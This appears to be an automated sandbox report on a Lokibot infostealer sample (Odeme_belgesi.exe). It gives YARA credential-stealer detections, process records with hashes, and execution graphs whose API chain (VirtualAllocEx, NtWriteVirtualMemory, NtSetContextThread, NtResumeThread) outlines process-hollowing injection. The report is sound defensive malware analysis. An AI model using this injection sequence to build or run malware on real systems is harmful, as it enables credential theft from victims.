              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low
              Has exited:true

              Target ID:1
              Start time:04:54:55
              Start date:01/10/2024
              Path:C:\Users\user\Desktop\Odeme_belgesi.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\Odeme_belgesi.exe
              Imagebase:0xd20000
              File size:554'496 bytes
              MD5 hash:FC9C0D308E1E66CAF355A329F171362A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:false

              Target ID:2
              Start time:04:54:55
              Start date:01/10/2024
              Path:C:\Users\user\Desktop\Odeme_belgesi.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\Odeme_belgesi.exe
              Imagebase:0x100000
              File size:554'496 bytes
              MD5 hash:FC9C0D308E1E66CAF355A329F171362A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:false

              Target ID:5
              Start time:04:54:56
              Start date:01/10/2024
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 80
              Imagebase:0xec0000
              File size:483'680 bytes
              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:13.2%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:15.7%
                Total number of Nodes:172
                Total number of Limit Nodes:6
                execution_graph 16029 a6e0828 16031 a6e0844 16029->16031 16030 a6e0885 16032 a6e09e1 16030->16032 16105 a6edf98 16030->16105 16117 a6edc41 16030->16117 16122 a6ee84a 16030->16122 16131 a6edb45 16030->16131 16137 a6ee38d 16030->16137 16147 a6eddcf 16030->16147 16156 a6ee782 16030->16156 16161 a6ee63d 16030->16161 16166 a6eda25 16030->16166 16031->16030 16049 a6ec28d 16031->16049 16060 a6eba4a 16031->16060 16071 a6ec133 16031->16071 16079 a6ebea0 16031->16079 16084 a6eb858 16031->16084 16089 a6ebcf2 16031->16089 16094 a6eb6c3 16031->16094 16050 a6ec2b8 16049->16050 16171 a6ecc28 16050->16171 16176 a6ecc38 16050->16176 16051 a6ec2d4 16181 a6ed7f9 16051->16181 16185 a6ed800 16051->16185 16052 a6ec3b2 16189 a6ed480 16052->16189 16193 a6ed488 16052->16193 16053 a6ec465 16061 a6eba56 16060->16061 16067 a6ecc28 2 API calls 16061->16067 16068 a6ecc38 2 API calls 16061->16068 16062 a6ebaad 16205 a6ed6a8 16062->16205 16209 a6ed6a1 16062->16209 16063 a6ebae9 16065 a6ecc28 2 API calls 16063->16065 16066 a6ecc38 2 API calls 16063->16066 16064 a6ebb48 16065->16064 16066->16064 16067->16062 16068->16062 16072 a6ec142 16071->16072 16075 a6ecc28 2 API calls 16072->16075 16076 a6ecc38 2 API calls 16072->16076 16073 a6ec1bb 16077 a6ecc28 2 API calls 16073->16077 16078 a6ecc38 2 API calls 16073->16078 16074 a6ec1ff 16075->16073 16076->16073 16077->16074 16078->16074 16080 a6ebec6 16079->16080 16082 a6ed6a8 NtWriteVirtualMemory 16080->16082 16083 a6ed6a1 NtWriteVirtualMemory 16080->16083 16081 a6ebf93 16082->16081 16083->16081 16085 a6eb864 16084->16085 16087 a6ed6a8 NtWriteVirtualMemory 16085->16087 16088 a6ed6a1 NtWriteVirtualMemory 16085->16088 16086 a6eb8fd 16087->16086 16088->16086 16090 a6ebd0d 16089->16090 16092 a6ed7f9 NtSetContextThread 16090->16092 16093 a6ed800 NtSetContextThread 16090->16093 16091 a6ebd85 16092->16091 16093->16091 16095 a6eb6cf 16094->16095 16103 a6ed488 NtResumeThread 16095->16103 16104 a6ed480 NtResumeThread 16095->16104 16096 a6eb70e 16101 a6ecc28 2 API calls 16096->16101 16102 a6ecc38 2 API calls 16096->16102 16097 a6eb7d0 16213 a6ed588 16097->16213 16217 a6ed580 16097->16217 16098 a6eb80e 16101->16097 16102->16097 16103->16096 16104->16096 16106 a6edfb3 16105->16106 16110 a6ed7f9 NtSetContextThread 16106->16110 16111 a6ed800 NtSetContextThread 16106->16111 16107 a6ee02b 16112 a6ed6a8 NtWriteVirtualMemory 16107->16112 16113 a6ed6a1 NtWriteVirtualMemory 16107->16113 16108 a6ee0d7 16221 a6eeb40 16108->16221 16226 a6eeb30 16108->16226 16231 a6eeab2 16108->16231 16109 a6ee125 16110->16107 16111->16107 16112->16108 16113->16108 16118 a6edc4d 16117->16118 16120 a6ed488 NtResumeThread 16118->16120 16121 a6ed480 NtResumeThread 16118->16121 16119 a6edc8b 16120->16119 16121->16119 16123 a6ee856 16122->16123 16128 a6eeab2 2 API calls 16123->16128 16129 a6eeb40 2 API calls 16123->16129 16130 a6eeb30 2 API calls 16123->16130 16124 a6ee8ad 16126 a6ed6a8 NtWriteVirtualMemory 16124->16126 16127 a6ed6a1 NtWriteVirtualMemory 16124->16127 16125 a6ee8e9 16126->16125 16127->16125 16128->16124 16129->16124 16130->16124 16132 a6edb4f 16131->16132 16134 a6eeab2 2 API calls 16132->16134 16135 a6eeb40 2 API calls 16132->16135 16136 a6eeb30 2 API calls 16132->16136 16133 a6edb9d 16134->16133 16135->16133 16136->16133 16138 a6ee3a2 16137->16138 16144 a6eeab2 2 API calls 16138->16144 16145 a6eeb40 2 API calls 16138->16145 16146 a6eeb30 2 API calls 16138->16146 16139 a6ee3be 16141 a6eeab2 2 API calls 16139->16141 16142 a6eeb40 2 API calls 16139->16142 16143 a6eeb30 2 API calls 16139->16143 16140 a6ee402 16141->16140 16142->16140 16143->16140 16144->16139 16145->16139 16146->16139 16148 a6edddb 16147->16148 16151 a6eeab2 2 API calls 16148->16151 16152 a6eeb40 2 API calls 16148->16152 16153 a6eeb30 2 API calls 16148->16153 16149 a6ede28 16154 a6ed588 VirtualAllocEx 16149->16154 16155 a6ed580 VirtualAllocEx 16149->16155 16150 a6ede66 16151->16149 16152->16149 16153->16149 16154->16150 16155->16150 16157 a6ee79e 16156->16157 16159 a6ed6a8 NtWriteVirtualMemory 16157->16159 16160 a6ed6a1 NtWriteVirtualMemory 16157->16160 16158 a6ee826 16159->16158 16160->16158 16162 a6ee649 16161->16162 16164 a6ed488 NtResumeThread 16162->16164 16165 a6ed480 NtResumeThread 16162->16165 16163 a6ee688 16164->16163 16165->16163 16167 a6eda31 16166->16167 16169 a6ed7f9 NtSetContextThread 16167->16169 16170 a6ed800 NtSetContextThread 16167->16170 16168 a6ed9f1 16168->16032 16169->16168 16170->16168 16172 a6ecc9c 16171->16172 16173 a6ecc36 16171->16173 16172->16051 16173->16172 16197 a6ed2c8 16173->16197 16201 a6ed2d0 16173->16201 16178 a6ecc5c 16176->16178 16177 a6ecc9c 16177->16051 16178->16177 16179 a6ed2c8 NtReadVirtualMemory 16178->16179 16180 a6ed2d0 NtReadVirtualMemory 16178->16180 16179->16178 16180->16178 16182 a6ed849 NtSetContextThread 16181->16182 16184 a6ed8c1 16182->16184 16184->16052 16186 a6ed849 NtSetContextThread 16185->16186 16188 a6ed8c1 16186->16188 16188->16052 16190 a6ed4cc NtResumeThread 16189->16190 16192 a6ed523 16190->16192 16192->16053 16194 a6ed4cc NtResumeThread 16193->16194 16196 a6ed523 16194->16196 16196->16053 16198 a6ed31c NtReadVirtualMemory 16197->16198 16200 a6ed394 16198->16200 16200->16173 16202 a6ed31c NtReadVirtualMemory 16201->16202 16204 a6ed394 16202->16204 16204->16173 16206 a6ed6f1 NtWriteVirtualMemory 16205->16206 16208 a6ed78a 16206->16208 16208->16063 16210 a6ed6f1 NtWriteVirtualMemory 16209->16210 16212 a6ed78a 16210->16212 16212->16063 16214 a6ed5cc VirtualAllocEx 16213->16214 16216 a6ed644 16214->16216 16216->16098 16218 a6ed5cc VirtualAllocEx 16217->16218 16220 a6ed644 16218->16220 16220->16098 16223 a6eeb64 16221->16223 16222 a6eecd9 16222->16109 16223->16222 16224 a6ed2c8 NtReadVirtualMemory 16223->16224 16225 a6ed2d0 NtReadVirtualMemory 16223->16225 16224->16223 16225->16223 16228 a6eeb64 16226->16228 16227 a6eecd9 16227->16109 16228->16227 16229 a6ed2c8 NtReadVirtualMemory 16228->16229 16230 a6ed2d0 NtReadVirtualMemory 16228->16230 16229->16228 16230->16228 16233 a6eeae6 16231->16233 16232 a6eecd9 16232->16109 16233->16232 16234 a6ed2c8 NtReadVirtualMemory 16233->16234 16235 a6ed2d0 NtReadVirtualMemory 16233->16235 16234->16233 16235->16233 16236 a6ec658 16238 a6ec6e8 CreateProcessW 16236->16238 16239 a6ecabc 16238->16239 16243 28e1838 16244 28e1885 VirtualProtect 16243->16244 16245 28e18f1 16244->16245

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 28ed310-28ed333 1 28ed33a-28ed388 0->1 2 28ed335 0->2 4 28ed38b 1->4 2->1 5 28ed392-28ed3ae 4->5 6 28ed3b7-28ed3b8 5->6 7 28ed3b0 5->7 14 28ed4f0-28ed555 6->14 7->4 7->6 8 28ed3bd-28ed3d8 7->8 9 28ed4aa-28ed4eb 7->9 10 28ed3da-28ed40c 7->10 11 28ed42b-28ed442 7->11 12 28ed477-28ed4a5 7->12 13 28ed447-28ed44b 7->13 7->14 8->5 9->5 26 28ed414-28ed426 10->26 11->5 12->5 15 28ed45e-28ed465 13->15 16 28ed44d-28ed45c 13->16 28 28ed55d-28ed567 14->28 20 28ed46c-28ed472 15->20 16->20 20->5 26->5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: 'KEF$.7>$/*2$VReJ$VReJ
                • API String ID: 0-4064818871
                • Opcode ID: 8d7a5bb16c30c9a0b52122860138f7e80af2c9b5190b8a2be5a1f842c065dd2d
                • Instruction ID: a56d9724c02dc8c4ed643f00f1ec1109db9a771adf9351777ff7b00abf4620a8
                • Opcode Fuzzy Hash: 8d7a5bb16c30c9a0b52122860138f7e80af2c9b5190b8a2be5a1f842c065dd2d
                • Instruction Fuzzy Hash: 7671C374E01219CFCF08CFA9D9846EEBBB6FB89304F14942AD41AAB254E7345945CF54

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 137 4ff67e0-4ff68ab 138 4ff68ad 137->138 139 4ff68b2-4ff6958 137->139 138->139 146 4ff6959 139->146 147 4ff6960-4ff697c 146->147 148 4ff697e 147->148 149 4ff6985-4ff6986 147->149 148->146 150 4ff698b-4ff69a0 148->150 151 4ff6a75-4ff6ae5 148->151 152 4ff6a3a-4ff6a70 148->152 153 4ff6a19-4ff6a35 148->153 154 4ff69e9-4ff69ed 148->154 155 4ff69c4-4ff69ca 148->155 156 4ff69a2-4ff69c2 148->156 149->150 149->151 150->147 170 4ff6ae7 call 4ff832b 151->170 171 4ff6ae7 call 4ff79f9 151->171 172 4ff6ae7 call 4ff8658 151->172 173 4ff6ae7 call 4ff81a2 151->173 152->147 153->147 157 4ff69ef-4ff69fe 154->157 158 4ff6a00-4ff6a07 154->158 168 4ff69cc call 4ff6fe0 155->168 169 4ff69cc call 4ff6fa0 155->169 156->147 160 4ff6a0e-4ff6a14 157->160 158->160 159 4ff69d2-4ff69e4 159->147 160->147 167 4ff6aed-4ff6af7 168->159 169->159 170->167 171->167 172->167 173->167
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: Tezq$Tezq
                • API String ID: 0-356135718
                • Opcode ID: ca6b645ef2c04fbc4af04a9f524985dfa46415e1ebadd1a58f6426d63e34b842
                • Instruction ID: 4487fa4e6c0758fa02a80b12c2e8115ceea10aadda9a82141f595b2dbde17967
                • Opcode Fuzzy Hash: ca6b645ef2c04fbc4af04a9f524985dfa46415e1ebadd1a58f6426d63e34b842
                • Instruction Fuzzy Hash: 53A15A71E00219CFDB04CFA9D9845EEFBB2FF89310F20956AD906AB265DB355816CF90

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 174 28eb980-28eb9a2 175 28eb9a9-28eb9c7 174->175 176 28eb9a4 174->176 177 28eb9c8 175->177 176->175 178 28eb9cf-28eb9eb 177->178 179 28eb9ed 178->179 180 28eb9f4-28eb9f5 178->180 179->177 179->180 181 28eb9fa-28eba3f 179->181 182 28ebc5b-28ebc64 179->182 183 28ebc80-28ebc88 179->183 184 28eba41-28ebb4c call 28eaae0 179->184 180->183 181->178 185 28ebc66-28ebc69 182->185 186 28ebc73-28ebc7f 182->186 208 28ebb4e 184->208 209 28ebb53-28ebb60 184->209 185->186 208->209 210 28ebb67-28ebb79 209->210 211 28ebb62 209->211 212 28ebb7b 210->212 213 28ebb80-28ebb92 210->213 211->210 212->213 214 28ebb99-28ebbe3 213->214 215 28ebb94 213->215 219 28ebbf8-28ebc00 214->219 220 28ebbe5-28ebbf5 214->220 215->214 222 28ebc07-28ebc14 219->222 220->219 223 28ebc2a 222->223 224 28ebc16-28ebc28 222->224 225 28ebc2d-28ebc2f 223->225 224->225 226 28ebc42-28ebc49 225->226 227 28ebc31-28ebc40 225->227 228 28ebc50-28ebc56 226->228 227->228 228->178
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: L"B$$L"B$
                • API String ID: 0-173250431
                • Opcode ID: 4eef956bb0f841521209f999767fa129355cb2c0377b37399dfb8d7c0ee03453
                • Instruction ID: bd5e9fbf3698dacac5f4c486839f41ef3121e4fc43d3a014eaef54739f8a83aa
                • Opcode Fuzzy Hash: 4eef956bb0f841521209f999767fa129355cb2c0377b37399dfb8d7c0ee03453
                • Instruction Fuzzy Hash: 81A108B8E04218DFDB08DFA9D58499EBBF2FF89305F148569E415AB364DB309942CF50

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 229 28e24eb-28e24fc 230 28e251e-28e256b 229->230 231 28e24fe-28e251b 229->231 232 28e256d 230->232 233 28e2572-28e25e8 call 28e0158 230->233 231->230 232->233 239 28e25eb 233->239 240 28e25f2-28e260e 239->240 241 28e2617-28e2618 240->241 242 28e2610 240->242 243 28e261d-28e2639 241->243 244 28e2738-28e27a8 call 28e0168 241->244 242->239 242->243 242->244 245 28e26ee-28e26f6 call 28e2d89 242->245 246 28e26be-28e26c2 242->246 247 28e271c-28e2733 242->247 248 28e263b-28e2674 242->248 249 28e2679-28e26b9 242->249 243->240 264 28e27aa call 28e38f4 244->264 265 28e27aa call 28e3965 244->265 266 28e27aa call 28e3c72 244->266 267 28e27aa call 28e38e1 244->267 268 28e27aa call 28e3811 244->268 253 28e26fc-28e2717 245->253 250 28e26c4-28e26d3 246->250 251 28e26d5-28e26dc 246->251 247->240 248->240 249->240 252 28e26e3-28e26e9 250->252 251->252 252->240 253->240 263 28e27b0-28e27ba 264->263 265->263 266->263 267->263 268->263
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: Tezq$Tezq
                • API String ID: 0-356135718
                • Opcode ID: e05110cb4459460b8b576ee77faea6786298a044c768ed63a17bb5b63bbf00e9
                • Instruction ID: 53e597af72c06cafdc289fe276ce19fb262a06bfc0e8007d742904e75db3c790
                • Opcode Fuzzy Hash: e05110cb4459460b8b576ee77faea6786298a044c768ed63a17bb5b63bbf00e9
                • Instruction Fuzzy Hash: 9E912478E042598FCB08CFA9C890ADEFBB2FF89300F14856AD856AB359D7319945CF50

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 270 28ef590-28ef5b5 271 28ef5bc-28ef5e1 270->271 272 28ef5b7 270->272 274 28ef5e8-28ef604 271->274 272->271 275 28ef60d-28efa03 274->275 276 28ef606 274->276 276->275 277 28ef6eb-28ef6f7 276->277 278 28ef8e4-28ef8f9 276->278 279 28ef7a5-28ef7b7 276->279 280 28ef9e0-28ef9f7 276->280 281 28ef681-28ef695 276->281 282 28ef8fe-28ef91e 276->282 283 28ef69a-28ef6a6 276->283 284 28ef97a-28ef991 276->284 285 28ef8b8-28ef8c5 276->285 286 28ef718-28ef738 276->286 287 28ef759-28ef770 276->287 288 28ef775-28ef779 276->288 289 28ef893-28ef8b3 276->289 290 28ef9b0-28ef9b4 276->290 296 28ef6fe-28ef713 277->296 297 28ef6f9 277->297 278->274 279->274 280->274 281->274 282->274 292 28ef6ad 283->292 293 28ef6a8 283->293 302 28ef999-28ef9ab 284->302 285->274 286->274 287->274 298 28ef78c-28ef793 288->298 299 28ef77b-28ef78a 288->299 289->274 294 28ef9b6-28ef9c5 290->294 295 28ef9c7-28ef9ce 290->295 306 28ef6b7-28ef6c3 292->306 293->292 303 28ef9d5-28ef9db 294->303 295->303 296->274 297->296 304 28ef79a-28ef7a0 298->304 299->304 302->274 303->274 304->274 308 28ef6ca-28ef6e6 306->308 309 28ef6c5 306->309 308->274 309->308
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: *h"R$y$rj
                • API String ID: 0-1189100808
                • Opcode ID: ba6ffb45d4edb2461a48f896636201b99e046bc74caec4b177057457f124d4cf
                • Instruction ID: a8465c4d6615f79187d1c4a0ddb514c1d21fa2dd85436ffcabd935e2d771a445
                • Opcode Fuzzy Hash: ba6ffb45d4edb2461a48f896636201b99e046bc74caec4b177057457f124d4cf
                • Instruction Fuzzy Hash: C0811BB8D0420ADFCB14CF95C5814AEFBB2FF9A301B50D56AD516EB614D7349A42CF90

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 311 28e2548-28e256b 312 28e256d 311->312 313 28e2572-28e25e8 call 28e0158 311->313 312->313 319 28e25eb 313->319 320 28e25f2-28e260e 319->320 321 28e2617-28e2618 320->321 322 28e2610 320->322 323 28e261d-28e2639 321->323 324 28e2738-28e27a8 call 28e0168 321->324 322->319 322->323 322->324 325 28e26ee-28e26f6 call 28e2d89 322->325 326 28e26be-28e26c2 322->326 327 28e271c-28e2733 322->327 328 28e263b-28e2674 322->328 329 28e2679-28e26b9 322->329 323->320 345 28e27aa call 28e38f4 324->345 346 28e27aa call 28e3965 324->346 347 28e27aa call 28e3c72 324->347 348 28e27aa call 28e38e1 324->348 349 28e27aa call 28e3811 324->349 333 28e26fc-28e2717 325->333 330 28e26c4-28e26d3 326->330 331 28e26d5-28e26dc 326->331 327->320 328->320 329->320 332 28e26e3-28e26e9 330->332 331->332 332->320 333->320 343 28e27b0-28e27ba 345->343 346->343 347->343 348->343 349->343
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: Tezq$Tezq
                • API String ID: 0-356135718
                • Opcode ID: ae7b37305cea47324a092056548a94469977534360dba39a91e677250d7dd5e1
                • Instruction ID: 96835fc32a9fba0c2bd31bce55e7e9c27e616740e82208578e73727831a6cf90
                • Opcode Fuzzy Hash: ae7b37305cea47324a092056548a94469977534360dba39a91e677250d7dd5e1
                • Instruction Fuzzy Hash: 4281D4B8E042188FDF08CFA9C994A9EFBB6BF89304F10852AD916BB354D7705905CF50

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 350 4ff6888-4ff68ab 351 4ff68ad 350->351 352 4ff68b2-4ff6958 350->352 351->352 359 4ff6959 352->359 360 4ff6960-4ff697c 359->360 361 4ff697e 360->361 362 4ff6985-4ff6986 360->362 361->359 363 4ff698b-4ff69a0 361->363 364 4ff6a75-4ff6ae5 361->364 365 4ff6a3a-4ff6a70 361->365 366 4ff6a19-4ff6a35 361->366 367 4ff69e9-4ff69ed 361->367 368 4ff69c4-4ff69ca 361->368 369 4ff69a2-4ff69c2 361->369 362->363 362->364 363->360 383 4ff6ae7 call 4ff832b 364->383 384 4ff6ae7 call 4ff79f9 364->384 385 4ff6ae7 call 4ff8658 364->385 386 4ff6ae7 call 4ff81a2 364->386 365->360 366->360 370 4ff69ef-4ff69fe 367->370 371 4ff6a00-4ff6a07 367->371 381 4ff69cc call 4ff6fe0 368->381 382 4ff69cc call 4ff6fa0 368->382 369->360 373 4ff6a0e-4ff6a14 370->373 371->373 372 4ff69d2-4ff69e4 372->360 373->360 380 4ff6aed-4ff6af7 381->372 382->372 383->380 384->380 385->380 386->380
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: Tezq$Tezq
                • API String ID: 0-356135718
                • Opcode ID: 671703c5b477abc3fb7e20360b521f9e619d5e3c8991ee5874b35a011c8d1bab
                • Instruction ID: b72b002d20c8ce29d145ff4fed0727512eab7e2818403b86ee10bbefb6e4fe87
                • Opcode Fuzzy Hash: 671703c5b477abc3fb7e20360b521f9e619d5e3c8991ee5874b35a011c8d1bab
                • Instruction Fuzzy Hash: 3C81E475E002199FDB08CFA9D984A9EFBB2FF88300F20852AD515BB364DB356906CF51

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 387 28e2d89-28e2db9 388 28e2dbb 387->388 389 28e2dc0-28e2de5 387->389 388->389 390 28e2dec-28e2df8 389->390 391 28e2de7 389->391 392 28e2dfb 390->392 391->390 393 28e2e02-28e2e1e 392->393 394 28e2e27-28e2e28 393->394 395 28e2e20 393->395 396 28e2f6c-28e2f70 394->396 395->392 395->394 395->396 397 28e2e4d-28e2e51 395->397 398 28e2e2d-28e2e30 395->398 399 28e2e9d-28e2ea7 395->399 400 28e2f2a-28e2f41 395->400 401 28e2e7a-28e2e98 395->401 402 28e2f46-28e2f67 395->402 403 28e2ed5-28e2edc 395->403 406 28e2e64-28e2e6b 397->406 407 28e2e53-28e2e62 397->407 414 28e2e33 call 28e2fa3 398->414 415 28e2e33 call 28e2fb0 398->415 408 28e2eae-28e2ed0 399->408 409 28e2ea9 399->409 400->393 401->393 402->393 404 28e2ede 403->404 405 28e2ee3-28e2f25 403->405 404->405 405->393 411 28e2e72-28e2e78 406->411 407->411 408->393 409->408 410 28e2e39-28e2e4b 410->393 411->393 414->410 415->410
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: 5jZy$u6d`
                • API String ID: 0-1818839043
                • Opcode ID: e7116431cb8e1244ed972ac01e4705b3ec77ec85fedbe7b0ba646085ae57188d
                • Instruction ID: 56a31579088ef433c84eec7b8d7fb8755493c9e3763d37477bb9e1ea2b87dfd9
                • Opcode Fuzzy Hash: e7116431cb8e1244ed972ac01e4705b3ec77ec85fedbe7b0ba646085ae57188d
                • Instruction Fuzzy Hash: DB511BB8E0421ACFDB08CFAAC5415AEFBF2EF89300F14D46AD916A7255D7345A42CF94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 458 a6ec658-a6ec712 460 a6ec7ca-a6ec7df 458->460 461 a6ec718-a6ec753 458->461 462 a6ec88f-a6ec893 460->462 463 a6ec7e5-a6ec82b 460->463 478 a6ec78b-a6ec79c 461->478 479 a6ec755-a6ec75d 461->479 464 a6ec8dd-a6ec92e 462->464 465 a6ec895-a6ec8d7 462->465 481 a6ec82d-a6ec835 463->481 482 a6ec869-a6ec874 463->482 468 a6ec9e6-a6ec9f8 464->468 469 a6ec934-a6ec96f 464->469 465->464 471 a6ec9fa-a6eca12 468->471 472 a6eca15-a6eca27 468->472 499 a6ec9a7-a6ec9b8 469->499 500 a6ec971-a6ec979 469->500 471->472 475 a6eca29-a6eca41 472->475 476 a6eca44-a6ecaba CreateProcessW 472->476 475->476 483 a6ecabc-a6ecac2 476->483 484 a6ecac3-a6ecb04 476->484 487 a6ec7a2-a6ec7c2 478->487 485 a6ec75f-a6ec769 479->485 486 a6ec780-a6ec789 479->486 489 a6ec858-a6ec867 481->489 490 a6ec837-a6ec841 481->490 501 a6ec87a-a6ec889 482->501 483->484 504 a6ecb1b-a6ecb32 484->504 505 a6ecb06-a6ecb15 484->505 492 a6ec76d-a6ec77c 485->492 493 a6ec76b 485->493 486->487 487->460 489->501 496 a6ec845-a6ec854 490->496 497 a6ec843 490->497 492->492 502 a6ec77e 492->502 493->492 496->496 506 a6ec856 496->506 497->496 509 a6ec9be-a6ec9de 499->509 507 a6ec99c-a6ec9a5 500->507 508 a6ec97b-a6ec985 500->508 501->462 502->486 516 a6ecb4b-a6ecb5b 504->516 517 a6ecb34-a6ecb40 504->517 505->504 506->489 507->509 511 a6ec989-a6ec998 508->511 512 a6ec987 508->512 509->468 511->511 513 a6ec99a 511->513 512->511 513->507 518 a6ecb5d-a6ecb6c 516->518 519 a6ecb72-a6ecbb5 516->519 517->516 518->519 524 a6ecbb7-a6ecbbb 519->524 525 a6ecbc5-a6ecbc9 519->525 524->525 526 a6ecbbd-a6ecbc0 call a6e1920 524->526 527 a6ecbcb-a6ecbcf 525->527 528 a6ecbd9-a6ecbdd 525->528 526->525 527->528 530 a6ecbd1-a6ecbd4 call a6e1920 527->530 531 a6ecbdf-a6ecbe3 528->531 532 a6ecbed 528->532 530->528 531->532 534 a6ecbe5-a6ecbe8 call a6e1920 531->534 536 a6ecbee 532->536 534->532 536->536
                APIs
                • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0A6ECAA7
                Memory Dump Source
